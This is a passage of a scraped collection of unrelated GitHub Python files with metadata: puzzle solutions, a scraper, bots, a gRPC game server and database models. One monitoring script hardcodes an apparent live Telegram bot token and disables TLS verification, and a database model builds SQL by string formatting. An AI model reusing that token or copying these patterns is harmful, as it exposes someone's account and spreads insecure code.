len(res)],\n res[(i + 3000) % len(res)]\n ]\n print(sum(coord))\n","repo_name":"coderlew/advent-of-code","sub_path":"2022/20/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"70126778486","text":"def stemString(input_string):\n from nltk.stem.snowball import SnowballStemmer\n stemmer = SnowballStemmer(\"english\")\n\n tokens = input_string.split()\n singles = [stemmer.stem(token) for token in tokens]\n stemmed_string = ' '.join(singles)\n\n return stemmed_string\n\ntest_string = \"Still looking for Pokemon all over the street. When is Niantic fixing that stupid three step bug?\"\nprint(stemString(test_string))","repo_name":"askldjd/udacity-machine-learning","sub_path":"proj/ud120-projects/tools/stemmer-test.py","file_name":"stemmer-test.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"16270009664","text":"import color_contrast_calc as calc\n\nyellow = calc.color_from('yellow')\norange = calc.color_from('orange')\n\n\nreport = 'The grayscale of {:s} ({:s}) is {:s}'\n\nprint(report.format(yellow.hex, yellow.name,\n yellow.with_grayscale().hex))\nprint(report.format(orange.hex, orange.name,\n orange.with_grayscale().hex))\n","repo_name":"nico-hn/color_contrast_calc_py","sub_path":"examples/grayscale.py","file_name":"grayscale.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"41835866570","text":"import asyncio\nimport re\nimport typing as T\n\nfrom graia.application import GraiaMiraiApplication, Group, Friend, MessageChain\nfrom loguru import logger\n\nfrom pixiv import make_illust_message, papi, PixivResultError\nfrom utils import launch\nfrom .abstract_message_handler import AbstractMessageHandler\n\n\nclass PixivIllustQueryHandler(AbstractMessageHandler):\n\n async def handle(self, app: GraiaMiraiApplication,\n subject: T.Union[Group, Friend],\n message: MessageChain,\n channel: asyncio.Queue) -> bool:\n # 检测是否触发\n accept = False\n content = message.asDisplay()\n for x in self.trigger:\n if x in content:\n accept = True\n break\n\n if not accept:\n return False\n\n # 提取消息中的所有id\n regex = re.compile(\"[1-9][0-9]*\")\n ids = [int(x) for x in regex.findall(content)]\n logger.info(f\"{self.tag}: {ids}\")\n\n # 每个id建立一个task,以获取插画并扔到channel中\n async def make_msg(illust_id):\n try:\n result = await launch(papi.illust_detail, illust_id=illust_id)\n if \"error\" in result:\n raise PixivResultError(result[\"error\"])\n else:\n msg = await make_illust_message(result[\"illust\"])\n logger.info(f\"\"\"{self.tag}: [{result[\"illust\"][\"id\"]}] ok\"\"\")\n except Exception as exc:\n msg = self.handle_and_make_error_message(exc)\n\n await channel.put(msg)\n\n tasks = []\n for x in ids:\n tasks.append(asyncio.create_task(make_msg(x)))\n\n await asyncio.wait(tasks, return_when=asyncio.ALL_COMPLETED)\n return True\n","repo_name":"dk13333972721/PixivBot","sub_path":"handler/pixiv_illust_query_handler.py","file_name":"pixiv_illust_query_handler.py","file_ext":"py","file_size_in_byte":1800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"76"} +{"seq_id":"26979227769","text":"import requests\nfrom bs4 import BeautifulSoup as bs\nimport lxml\n\n\nURL = 'https://www.wildberries.ru/catalog/sport/vidy-sporta/fitnes/yoga'\n\nHEADERS = {'accept':'*/*','user-agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36'}\n\nsession = requests.Session()\n\nrequest = session.get(URL,headers=HEADERS)\ni = 0\nif request.status_code == 200:\n soup = bs(request.content,'xml')\n list_tag_a = soup.find_all('a',{'class':'ref_goods_n_p j-open-full-product-card'})\n for a in list_tag_a:\n print(a['href'])\n # category = a.find('span',{'class':'goods-name c-text-sm'})\n # product = a.find('strong',{'class':'brand-name c-text-sm'})\n # image = a.find_all('img',{'class':'thumbnail'})[1]['src']\n # raiting = a.find('span',{'itemprop':'aggregateRating'})\n # # number_of_sales_transfer = 0\n # price_no_discont = str(a.find('span',{'class':'price-old-block'})).split('del')\n # if len(price_no_discont)>2:\n # print(price_no_discont[1].replace('>','').split('<')[0])\n # price_discont = a.find('ins',{'class':'lower-price'})\n # quantity_reviews = a.find('span',{'class':'dtList-comments-count c-text-sm'})\n # print(category.text)\n # print(product.text)\n # print(image)\n # print(raiting)\n # if len(price_no_discont)>2:\n # price_no_discont = price_no_discont[1].replace('>','').split('<')[0]\n # print(price_no_discont)\n # print(price_discont)\n # print(quantity_reviews)\n # i += 1\n # print(i)\n","repo_name":"maxim3722/wildberriesscraping","sub_path":"test_page_parser_wildberries.py","file_name":"test_page_parser_wildberries.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"4498776719","text":"import datetime\nimport requests, pyodbc, os\nimport logging\nos.environ[\"NLS_LANG\"] = \".UTF8\"\npyodbc.pooling = False\n\nclass Monitoring():\n\n def __init__(self):\n logging.basicConfig(filename='myapp.log', level=logging.INFO)\n\n def send_alert(self, text):\n \"\"\" Метод для отправки уведомлений на телегу\n данные собирает из вьюшки [dbo].[vFaultedJobsToday2]\n со статусом Faulted, то что обработал, записывает в таблицу [dbo].[faulted_id2] \"\"\"\n\n process = \"update WB\"\n server = \"PC KEML\"\n info = text\n createtime = datetime.datetime.now()\n head = \"---------------------------------------------------------------------------\\n\"\n row1 = \" {} \\n\".format(\"🔥🔥🔥 \" + process)\n row2 = \" {} \\n\".format(\"🖥️ \" + server)\n row3 = \" {} \\n\".format(\"💡 \" + info.replace(\"\\n\", \"\"))\n row4 = \" {} \\n\".format(\"⌚ \" + str(createtime))\n footer = \"---------------------------------------------------------------------------\\n\"\n\n msg = row1 + row2 + row3 + row4\n self.send_message_bot(msg)\n logging.info('row with id ' + str(id) + \"processed\")\n\n\n def send_message_bot(self, text):\n endPoint = \"https://api.telegram.org/bot\"\n # id = \"-579581470\"\n id = \"-914261239\" # supergroup id\n Token = \"5681293588:AAEWMxiSSAdVkc0HRW1yTEAzDqOGVKzokWk/\"\n r = requests.get(url=endPoint+Token+\"sendMessage?chat_id=\"+id+\"&text=\"+text+\"&parse_mode=html\", verify=False)\n\n resp = r.json()\n if resp[\"ok\"]:\n return 'successfull'\n else:\n raise RuntimeError(r.content)\n\n\ncls = Monitoring()\ncls.send_alert(\"I have some updates for you\")\n\n\n\n\n","repo_name":"darkmanjscz/Keml","sub_path":"monitoring.py","file_name":"monitoring.py","file_ext":"py","file_size_in_byte":1906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"34456879078","text":"import logging\nimport time\nfrom concurrent import futures\nfrom google.protobuf import message\nimport pika\nimport grpc\nimport json\nimport app.gameimpl.spelling_bee as spelling_bee\nfrom spelling_bee_game_pb2 import GameResponse, FinalizeResponse, SuggestionResponse, Word, RegisterResponse, StatusResponse\nfrom spelling_bee_game_pb2_grpc import SpellingBeeGameServicer, add_SpellingBeeGameServicer_to_server\nfrom game_registry import GameRegistry\nfrom domain import spelling_bee_game, suggestion\nfrom pattern import object_factory\nfrom datatype.enums import GameStatus\n\nclass SpellingBeeServer(SpellingBeeGameServicer):\n\n def __init__(self):\n self.game_type = \"Spelling Bee Multi player\"\n self.factory = object_factory.ObjectFactory()\n self.factory.register_builder(\n \"Spelling Bee Multi player\", spelling_bee.SpellingBeeGameBuilder())\n self.registry = GameRegistry.get_instance()\n\n def CreateGame(self, request, context):\n print(\"in create game\")\n new_game = self.factory.create(request.gameType)\n game = spelling_bee_game.SpellingBeeGame()\n game.register_player(request.userName)\n new_game.set_game(game)\n game_id = self.registry.add_game(new_game)\n print(\"Created game: \" + game_id)\n return GameResponse(gameId=game_id)\n \n def RegisterPlayer(self, request, context):\n print(\"in register player\")\n game = self.registry.get_game(request.gameId)\n playerIndex = -1 if game == -1 else game.game.register_player(request.userName)\n if playerIndex == -1: print(\"Incorrect game id by user.\")\n return RegisterResponse(playerIndex=playerIndex)\n \n def GameStatus(self, request, context):\n # print(\"in game status\") # commented out to avoid spam in server\n game = self.registry.get_game(request.gameId)\n myPangram = game.retrieve_pangram() if game.retrieve_pangram() else \"\"\n status = True if game.game.status == GameStatus.IN_PROGRESS else False\n playerCount = len(game.game.players);\n return StatusResponse(playerCount=playerCount, pangram=myPangram, status=status)\n \n def FinalizeGame(self, request, context):\n print(\"in finalize\")\n game = self.registry.get_game(request.gameId)\n game.finalize_setup()\n return FinalizeResponse()\n \n def ProcessSuggestion(self, request, context):\n print(\"In 'visit' for: \" + str(request.gameId))\n my_suggestion = suggestion.Suggestion(request.suggestion)\n game = self.registry.get_game(request.gameId)\n \n result, response = game.process_suggestion(\n request.playerIndex, my_suggestion)\n \n message = \"\"\n for n in range(0, len(game.game.players)):\n message += f\"\\n{game.game.players[n]} stats:\\n\"\\\n f\"- Words = {game.game.words[n].keys()}\\n\"\\\n f\"- Score = {game.game.scores[n]}\\n\" \n \n connection = pika.BlockingConnection(pika.ConnectionParameters('localhost'))\n channel = connection.channel()\n channel.queue_declare(queue='player-stats')\n channel.basic_publish(exchange='',routing_key='player-stats',body=json.dumps(message))\n connection.close()\n \n return SuggestionResponse(result=result, message=response)\n \ndef serve():\n server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))\n add_SpellingBeeGameServicer_to_server(SpellingBeeServer(), server)\n server.add_insecure_port('[::]:50055')\n server.start()\n print(\"Server running!\\nWaiting for client...\")\n server.wait_for_termination()\n\n\nif __name__ == '__main__':\n logging.basicConfig()\n serve()\n","repo_name":"RomainClem/SpellingBeeDistSys","sub_path":"app/server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"25854086992","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\nfrom AppInit import db, sqlSession\nfrom flask_login import UserMixin\n\n\nclass HostModel(db.Model, UserMixin):\n __tablename__ = 'ops_host_detail'\n\n id = db.Column(db.Integer, autoincrement=True, primary_key=True)\n host_id = db.Column(db.String(255), primary_key=True)\n host_name = db.Column(db.String(255))\n host_ip = db.Column(db.String(255))\n host_total_disk = db.Column(db.String(255))\n host_used_disk = db.Column(db.String(255))\n host_avai_disk = db.Column(db.String(255))\n host_total_memory = db.Column(db.Integer)\n host_free_memory = db.Column(db.Integer)\n host_avai_memory = db.Column(db.Integer)\n host_model_cpu = db.Column(db.String(255))\n host_physical_cpu = db.Column(db.String(255))\n host_logic_cpu = db.Column(db.String(255))\n host_os_time = db.Column(db.String(255))\n host_os_version = db.Column(db.String(255))\n host_computing_time = db.Column(db.String(255))\n update_time = db.Column(db.String(255))\n\n def __init__(self, id, host_id, host_name, host_ip, host_total_disk,\n host_used_disk, host_avai_disk, host_total_memory, host_free_memory, host_avai_memory,\n host_model_cpu, host_physical_cpu, host_logic_cpu, host_os_time, host_computing_time, host_os_version,update_time):\n self.id = id\n self.host_id = host_id\n self.host_name = host_name\n self.host_ip = host_ip\n self.host_total_disk = host_total_disk\n self.host_used_disk = host_used_disk\n self.host_avai_disk = host_avai_disk\n self.host_total_memory = host_total_memory\n self.host_free_memory = host_free_memory\n self.host_avai_memory = host_avai_memory\n self.host_model_cpu = host_model_cpu\n self.host_physical_cpu = host_physical_cpu\n self.host_logic_cpu = host_logic_cpu\n self.host_os_time = host_os_time\n self.host_computing_time = host_computing_time\n self.host_os_version = host_os_version\n self.update_time = update_time\n\n @staticmethod\n def query_by_hostsID(host_id):\n return HostModel.query.filter(HostModel.host_id == host_id).first()\n\n @staticmethod\n def all():\n return HostModel.query.all()\n\n @staticmethod\n def with_entities(*entities):\n return HostModel.query.with_entities(*entities)\n\n def __repr__(self):\n return '' % self.id\n\n def exeSql(sql, echo):\n if echo:\n print(sql)\n return sqlSession.execeQuery(sql)\n\n def getHostInfo(echo=False):\n sql = '''SELECT host_id,\n host_ip,\n host_name,\n host_total_memory,\n host_total_disk,\n host_logic_cpu,\n host_computing_time,\n host_os_version FROM {} order by host_id;'''.format(HostModel.__tablename__)\n return HostModel.exeSql(sql, echo)\n\n def updateHostsDetail(keys, values, echo=False):\n sql = \"REPLACE INTO {} ({})VALUES({})\".format(HostModel.__tablename__,\n str(keys).replace(\"'\", \"\").replace('[', '').replace(']', ''),\n str(values).replace('[', '').replace(']', ''))\n HostModel.exeSql(sql, echo)\n","repo_name":"jiuhonglaugh/rocket","sub_path":"control/model/HostModel.py","file_name":"HostModel.py","file_ext":"py","file_size_in_byte":3372,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"70754534327","text":"\"\"\"\nCreates DataRobot projects and deployments for specified dataset and use case.\n\nInformation about the projects and deployments are stored in a reference file.\n\"\"\"\n\nimport datarobot as dr\nimport pandas as pd\nimport drutils as du\n\n# setup\ncf = du.load_config('../usecase_config.yaml')\ndr.Client(config_path='../drconfig.yaml')\n\ndf = pd.read_csv(cf['dataset'])\n# optional filtering to reduce deployments\ndf = df[df[cf['series']].isin(cf['filter'])]\n\n################################################################################\n# project setup\nspec = du.setup_basic_time_spec(cf)\n\n# check existing deployments\ndeployments = dr.Deployment.list()\ndeployment_names = [d.label for d in deployments]\n\n# pull out server information for deployment\nprediction_server = dr.PredictionServer.list()[0]\n\nreference = pd.DataFrame()\n\n# iterate through series\nfor s in df[cf['series']].unique():\n proj_name = 'auto retrain ' + s + ' ' + df[cf['timecol']].max()\n subdf = df[df[cf['series']] == s]\n print('creating deployment for ' + s)\n # get or create project\n project = du.get_existing_project(proj_name)\n if project is None:\n # upload data and create project\n project = dr.Project.create(subdf, project_name=proj_name)\n # finalise project, and run autopilot with max workers\n project.set_target(cf['target'],\n partitioning_method=spec,\n metric=cf['metric'],\n worker_count=-1)\n project.wait_for_autopilot()\n # take best model and deploy\n model = dr.ModelRecommendation.get(project.id).get_model()\n if proj_name in deployment_names:\n deployment = deployments[deployment_names.index(proj_name)]\n else:\n deployment = dr.Deployment.create_from_learning_model(\n model.id,\n label=proj_name,\n description=cf['description'],\n default_prediction_server_id=prediction_server.id)\n # ensure deployment settings are turned on\n deployment.update_drift_tracking_settings(target_drift_enabled=True,\n feature_drift_enabled=True,\n max_wait=60)\n deployment.update_association_id_settings(\n column_names=['id'], required_in_prediction_requests=True, max_wait=60)\n # get metric for parent of frozen model\n parent = du.get_parent_model(model)\n # store information for later use\n reference = reference.append(\n pd.DataFrame([{\n 'use_case': s,\n 'latest_project': project.id,\n 'deployment_id': deployment.id,\n 'error': parent.metrics[cf['metric']]['crossValidation']\n }]))\n\nreference.to_csv(cf['ref_file'], index=False)\n","repo_name":"datarobot-community/tutorials-for-data-scientists","sub_path":"Model Management/Automated Retraining and Replacement/py/create_initial_deployments.py","file_name":"create_initial_deployments.py","file_ext":"py","file_size_in_byte":2762,"program_lang":"python","lang":"en","doc_type":"code","stars":77,"dataset":"github-code","pt":"76"} +{"seq_id":"28838066329","text":"import heapq\n\ndef solution(book_time):\n answer = 0\n \n # 분으로 변환\n book_min = []\n for start, end in book_time:\n start_h, start_m = map(int, start.split(\":\"))\n end_h, end_m = map(int, end.split(\":\"))\n book_min.append([start_h * 60 + start_m, end_h * 60 + end_m + 10])\n \n pq = []\n book_min.sort(key=lambda x: x[0])\n for start, end in book_min:\n while pq:\n if pq[0] <= start:\n heapq.heappop(pq)\n else:\n break\n \n heapq.heappush(pq, end)\n answer = max(answer, len(pq))\n \n return answer","repo_name":"gnlenfn/DailyProblemSolving","sub_path":"프로그래머스/unrated/155651. 호텔 대실/호텔 대실.py","file_name":"호텔 대실.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"11213041001","text":"from setuptools import setup\n\nDEPENDENCIES = open('requirements.txt', 'r').read().split('\\n')\nREADME = open('README.md', 'r').read()\n\nsetup(\n name='neochecker',\n version='1.0.0',\n description='Python library and CLI for checking Neo addresses',\n long_description=README,\n long_description_content_type='text/markdown',\n author='HexOffender',\n author_email='HexOffender_1337@protonmail.com',\n url=\"http://github.com/\",\n packages=['neochecker'],\n entry_points={\n 'console_scripts': ['neochecker = neochecker.neochecker:main']\n },\n install_requres=DEPENDENCIES,\n keywords=['security', 'network', 'cryptocurrency'],\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Natural Language :: English',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n ]\n)\n","repo_name":"BraveLittleRoaster/neochecker","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"6647841926","text":"import warnings\n\nfrom django.conf import settings\nfrom django.core.files import File\nfrom django.core.mail import get_connection\nfrom django.db.models import Q\n\ntry:\n from django.utils.encoding import force_text\nexcept ImportError:\n from django.utils.encoding import force_unicode as force_text\n\nfrom post_office import cache\nfrom .compat import string_types\nfrom .models import Email, PRIORITY, STATUS, EmailTemplate, Attachment\nfrom .settings import get_email_backend\n\ntry:\n from django.utils import timezone\n now = timezone.now\nexcept ImportError:\n import datetime\n now = datetime.datetime.now\n\n\ndef send_mail(subject, message, from_email, recipient_list, html_message='',\n scheduled_time=None, headers=None, priority=PRIORITY.medium):\n \"\"\"\n Add a new message to the mail queue. This is a replacement for Django's\n ``send_mail`` core email method.\n \"\"\"\n\n subject = force_text(subject)\n status = None if priority == PRIORITY.now else STATUS.queued\n emails = []\n for address in recipient_list:\n emails.append(\n Email.objects.create(\n from_email=from_email, to=address, subject=subject,\n message=message, html_message=html_message, status=status,\n headers=headers, priority=priority, scheduled_time=scheduled_time\n )\n )\n if priority == PRIORITY.now:\n for email in emails:\n email.dispatch()\n return emails\n\n\ndef send_queued_mail():\n \"\"\"\n Sends out all queued mails that has scheduled_time less than now or None\n \"\"\"\n sent_count = 0\n failed_count = 0\n queued_emails = Email.objects.filter(status=STATUS.queued) \\\n .filter(Q(scheduled_time__lte=now()) | Q(scheduled_time=None)) \\\n .order_by('-priority')\n\n if queued_emails:\n\n # Try to open a connection, if we can't just pass in None as connection\n try:\n connection = get_connection(get_email_backend())\n connection.open()\n except Exception:\n connection = None\n\n for mail in queued_emails:\n status = mail.dispatch(connection)\n if status == STATUS.sent:\n sent_count += 1\n else:\n failed_count += 1\n if connection:\n connection.close()\n print('%s emails attempted, %s sent, %s failed' % (\n len(queued_emails), sent_count, failed_count)\n )\n\n\ndef send_templated_mail(template_name, from_address, to_addresses,\n context={}, priority=PRIORITY.medium):\n warnings.warn(\n \"The `send_templated_mail` command is deprecated and will be removed \"\n \"in a future relase. Please use `post_office.mail.send` instead.\",\n DeprecationWarning)\n email_template = get_email_template(template_name)\n for address in to_addresses:\n email = Email.objects.from_template(from_address, address, email_template,\n context, priority)\n if priority == PRIORITY.now:\n email.dispatch()\n\n\ndef get_email_template(name):\n \"\"\"\n Function to get email template object that checks from cache first if caching is enabled\n \"\"\"\n if hasattr(settings, 'POST_OFFICE_CACHE') and settings.POST_OFFICE_TEMPLATE_CACHE is False:\n return EmailTemplate.objects.get(name=name)\n else:\n email_template = cache.get(name)\n if email_template is not None:\n return email_template\n else:\n email_template = EmailTemplate.objects.get(name=name)\n cache.set(name, email_template)\n return email_template\n\n\ndef split_emails(emails, split_count=1):\n # Group emails into X sublists\n # taken from http://www.garyrobinson.net/2008/04/splitting-a-pyt.html\n # Strange bug, only return 100 email if we do not evaluate the list\n if list(emails):\n return [emails[i::split_count] for i in range(split_count)]\n\n\ndef create_attachments(attachment_files):\n \"\"\"\n Create Attachment instances from files\n\n attachment_files is a dict of:\n * Key - the filename to be used for the attachment.\n * Value - file-like object, or a filename to open.\n\n Returns a list of Attachment objects\n \"\"\"\n attachments = []\n for filename, content in attachment_files.items():\n opened_file = None\n\n if isinstance(content, string_types):\n # `content` is a filename - try to open the file\n opened_file = open(content, 'rb')\n content = File(opened_file)\n\n attachment = Attachment()\n attachment.file.save(filename, content=content, save=True)\n\n attachments.append(attachment)\n\n if opened_file is not None:\n opened_file.close()\n\n return attachments\n","repo_name":"digideskio/django-post_office","sub_path":"post_office/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"76"} +{"seq_id":"787297642","text":"from gi import require_version\nrequire_version( 'Gtk', '3.0' )\nfrom gi.repository import Gtk\n\nimport copy\nimport os\n\nfrom matplotlib.figure import Figure\nfrom sympy import *\nfrom sympy.plotting import plot\nfrom ..proc.zoom import *\nfrom ..proc.eparser import *\nfrom ..proc.least import *\nfrom ..proc.pdfactory import *\n\nfrom numpy import *\nfrom matplotlib.backends.backend_gtk3cairo import FigureCanvasGTK3Cairo as FigureCanvas\n\nWIDTH = 10\nCOLOR = ['b','g','c', 'm', 'k']\nSTYLE = ['','-', '+', '', '--', '-.']\n\nclass GraphGrid(Gtk.Grid):\n\n def __init__(self, parent):\n Gtk.Grid.__init__(self)\n self.parent = parent\n\n self.fig = Figure( figsize=(6,6), dpi=65 )\n self.axis = self.fig.add_subplot( 111 )\n self.axis.grid( True )\n self.graph_count = 0\n\n self.set_border_width( WIDTH )\n self.set_column_homogeneous( 1 )\n self.set_row_spacing( WIDTH )\n self.set_column_spacing( WIDTH )\n\n #--ButtonGrid\n self.button_grid = Gtk.Grid()\n self.button_grid.set_border_width( WIDTH )\n self.button_grid.set_column_homogeneous( 1 )\n self.button_grid.set_row_spacing( WIDTH )\n self.button_grid.set_column_spacing( WIDTH )\n\n #--InputGrid\n self.txt_grid = Gtk.Grid()\n self.txt_grid.set_column_homogeneous( 1 )\n self.txt_grid.set_column_spacing( WIDTH )\n\n\n #--Buttons\n self.button_clear = Gtk.Button( 'Clear' )\n self.button_clear.connect( 'pressed', self.on_clear_press )\n self.button_add = Gtk.Button( 'Add' )\n self.button_add.connect( 'pressed', self.on_add_press )\n self.button_save = Gtk.Button( 'Save' )\n self.button_save.connect( 'pressed', self.on_save_press )\n self.button_snapshot = Gtk.Button( 'Snapshot' )\n self.button_snapshot.connect( 'pressed', self.on_snapshot_press )\n\n #--Text Input\n self.txt_eq = Gtk.Entry()\n self.txt_eq.set_placeholder_text('cos(var)...etc')\n self.lbl_eq = Gtk.Label( 'Equation:' )\n self.lbl_eq.set_justify( Gtk.Justification.LEFT )\n self.txt_var = Gtk.Entry()\n self.txt_var.set_placeholder_text('xc or x or y')\n self.lbl_var = Gtk.Label( 'Variables:' )\n self.lbl_var.set_justify( Gtk.Justification.LEFT )\n self.txt_ran = Gtk.Entry()\n self.txt_ran.set_placeholder_text('a,b')\n self.lbl_ran = Gtk.Label( 'Range:' )\n self.lbl_ran.set_justify( Gtk.Justification.LEFT )\n self.lbl_snapshot = Gtk.Label( 'Snapshot Taken' )\n self.lbl_snapshot.set_no_show_all( True )\n\n\n #--Graph added to canvas\n self.canvas = FigureCanvas( self.fig )\n self.canvas.set_size_request( 300, 300 )\n self.canvas.set_hexpand( True )\n self.canvas.set_vexpand( True )\n\n #--Button attachments\n self.button_grid.attach( self.txt_grid, 1,1,2,1 )\n self.button_grid.attach( self.button_add, 1,2,1,1 )\n self.button_grid.attach( self.button_clear, 2,2,1,1 )\n self.button_grid.attach( self.button_snapshot, 1,3,1,1 )\n self.button_grid.attach( self.button_save, 2,3,1,1 )\n self.button_grid.attach( self.lbl_snapshot, 1,4,2,1 )\n\n #--Entry attachments\n self.txt_grid.attach( self.lbl_var, 1,1,1,1 )\n self.txt_grid.attach( self.txt_var, 1,2,1,1 )\n self.txt_grid.attach( self.lbl_eq, 2,1,1,1 )\n self.txt_grid.attach( self.txt_eq, 2,2,1,1 )\n self.txt_grid.attach( self.lbl_ran, 3,1,1,1 )\n self.txt_grid.attach( self.txt_ran, 3,2,1,1 )\n\n #--Main Grid attachments\n self.attach( self.canvas, 1, 1, 1, 1 )\n self.attach( self.button_grid, 1, 2, 1, 1 )\n\n def render_main_eq( self, eq, vr, ran ):\n seq = sympify( eq )\n evaleq = lambdify(sympify( vr ), seq, modules=['numpy'])\n eq = str(eq).replace( '**', '^' )\n ran = linspace( ran[0], ran[1], 200)\n self.axis.set_title( 'fig.' + str(self.parent.cmodule.document.proc_count) )\n zp = ZoomPan()\n figZoom = zp.zoom_factory( self.axis, base_scale=1.05 )\n figPan = zp.pan_factory( self.axis )\n\n if self.graph_count > 0:\n #chooses random style for graph line\n line = COLOR[random.randint(0, len(COLOR) - 1)] + STYLE[random.randint(0, len(STYLE) - 1)]\n self.axis.set_ylim( top=10 )\n self.axis.plot( ran, evaleq(ran), line, label=eq )\n print( str(seq) )\n self.axis.legend( loc='best' )\n self.axis.margins( 0.4 )\n else:\n #first one is always red\n self.axis.plot( ran, evaleq(ran), 'r', label=eq )\n self.axis.legend( loc='best' )\n self.axis.margins( 0.4 )\n\n #makes the plot inmediatly render\n self.axis.figure.canvas.draw()\n self.graph_count += 1\n\n def save_render( self, filename ):\n self.fig.savefig(filename)\n\n def on_snapshot_press( self, button ):\n if self.parent.cmodule.document.proc_count > 0:\n self.save_render( 'ans' + str(self.parent.cmodule.document.proc_count - 1) + '.png' )\n else:\n self.save_render( 'ans' + str(self.parent.cmodule.document.proc_count) + '.png' )\n self.lbl_snapshot.show()\n\n def render_points( self, ptsx, ptsy, ran, lbl='Points given' ):\n if self.graph_count < 2:\n try:\n self.axis.plot( ptsx, ptsy, COLOR[random.randint(0, len(COLOR) - 1)] + 'o', label=lbl)\n self.axis.legend( loc='best' )\n self.axis.margins( 0.4 )\n except Exception:\n self.parent.raise_err_dialog( \"Invalid points to interpolate\" )\n\n def on_clear_press( self, button, opt=True ):\n self.axis.cla()\n self.axis.grid( True )\n self.graph_count = 0\n if opt:\n dialog = Gtk.MessageDialog(self.parent, 0, Gtk.MessageType.QUESTION,\n Gtk.ButtonsType.YES_NO, \"Warning!\")\n dialog.format_secondary_text(\n \"Do you wish to delete the Document in progress too?\")\n response = dialog.run()\n\n if response == Gtk.ResponseType.YES:\n self.parent.cmodule.document.proc_count = 0\n self.parent.cmodule.document.story = []\n self.lbl_snapshot.hide()\n dialog.destroy()\n\n def on_add_press( self, button ):\n try:\n ran = list_parser( self.txt_ran.get_text() )\n if len(ran) == 2:\n try:\n ran = [float(x) for x in ran]\n except TypeError:\n self.parent.raise_err_dialog( 'Invalid range for plotting' )\n return\n else:\n self.parent.raise_err_dialog( 'Invalid range for plotting' )\n return\n ran.sort()\n eq = list_parser( self.txt_eq.get_text() )\n if not ran:\n self.parent.raise_err_dialog( 'Invalid Range' );\n return\n elif not eq:\n self.parent.raise_err_dialog( 'Invalid Equation' )\n return\n elif len(self.txt_var.get_text()) > 2:\n self.parent.raise_err_dialog( 'Invalid Variable' )\n return\n else:\n self.render_main_eq( eq[0], self.txt_var.get_text(), ran )\n except Exception as e:\n self.parent.raise_err_dialog( 'Something went wrong: ' + str(e) )\n self.lbl_snapshot.hide()\n\n def on_save_press( self, button ):\n if self.parent.cmodule.document.story:\n sdialog = Gtk.FileChooserDialog( 'Saving', self.parent,\n Gtk.FileChooserAction.SAVE,\n (Gtk.STOCK_CANCEL, Gtk.ResponseType.CANCEL,\n Gtk.STOCK_OK, Gtk.ResponseType.OK))\n sdialog.set_current_name( \"procedure.pdf\" )\n response = sdialog.run()\n #--Checking if file exists and overwriting\n if response == Gtk.ResponseType.OK:\n if not os.path.exists( sdialog.get_filename() ):\n self.parent.cmodule.document.save_pdf( sdialog.get_filename() )\n print( 'saved' )\n sdialog.destroy()\n else:\n dialog = Gtk.MessageDialog(self.parent, 0, Gtk.MessageType.QUESTION,\n Gtk.ButtonsType.YES_NO, \"Warning!\")\n dialog.format_secondary_text(\n \"Do you wish to overwrite this file?\")\n overwrite = dialog.run()\n if overwrite == Gtk.ResponseType.YES:\n self.parent.cmodule.document.save_pdf( sdialog.get_filename() )\n print( 'overwrite' )\n dialog.destroy()\n sdialog.destroy()\n","repo_name":"deviantfero/leastfun","sub_path":"leastfun/gui/graph_grid.py","file_name":"graph_grid.py","file_ext":"py","file_size_in_byte":8839,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"6513915039","text":"import networkx as nx\nimport matplotlib.pyplot as plt\nG = nx.Graph()\nG.add_nodes_from([0,1,2])\nG.add_weighted_edges_from([[0, 1, 3.0], [1, 2, 7.5]])\nrandom_pos = nx.random_layout(G,seed=23) #This two lines to prevent the orientation change of the graph in result and initial state #This two lines to prevent the orientation change of the graph in result and initial state\nposition=nx.spring_layout(G,pos=random_pos)\nnx.draw_networkx_nodes(G,position,node_size=450)\nnx.draw_networkx_edges(G,position, edgelist=G.edges(),edge_color='black')\nprint(G.edges())\nweight=nx.get_edge_attributes(G,'weight')\nprint(weight)\nnx.draw_networkx_edge_labels(G,position,edge_labels=weight)\nnx.draw_networkx_labels(G,position)\nplt.show()","repo_name":"Abhishek0075/MinimumSpanningTree","sub_path":"important/importantTest1.py","file_name":"importantTest1.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"28836839689","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\nfrom collections import defaultdict\r\nimport heapq\r\n\r\nn, m, x = map(int, 